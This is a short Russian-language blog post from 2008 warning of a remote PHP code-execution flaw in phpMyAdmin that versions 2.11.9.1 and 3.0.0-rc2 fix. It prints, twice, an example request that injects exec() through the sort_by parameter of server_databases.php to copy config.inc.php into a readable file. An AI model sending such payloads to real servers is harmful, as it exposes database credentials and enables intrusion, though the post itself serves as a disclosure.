ахтунг phpmyadmin
Sep. 17th, 2008 11:24 pm![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png)
В популярном web-интерфейсе для управления СУБД MySQL - phpMyAdmin, используемом на многих хостингах, обнаружена критическая уязвимость, позволяющая удаленному злоумышленнику выполнить PHP-код на сервере, включая вызов внешних команд через PHP-функцию exec(). Проблема устранена в phpMyAdmin версиях 2.11.9.1 и 3.0.0-rc2.
Пример, запроса выполняющего команду "cp": http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
http://www.opennet.ru/opennews/art.shtml?num=17946
Пример, запроса выполняющего команду "cp": http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
http://www.opennet.ru/opennews/art.shtml?num=17946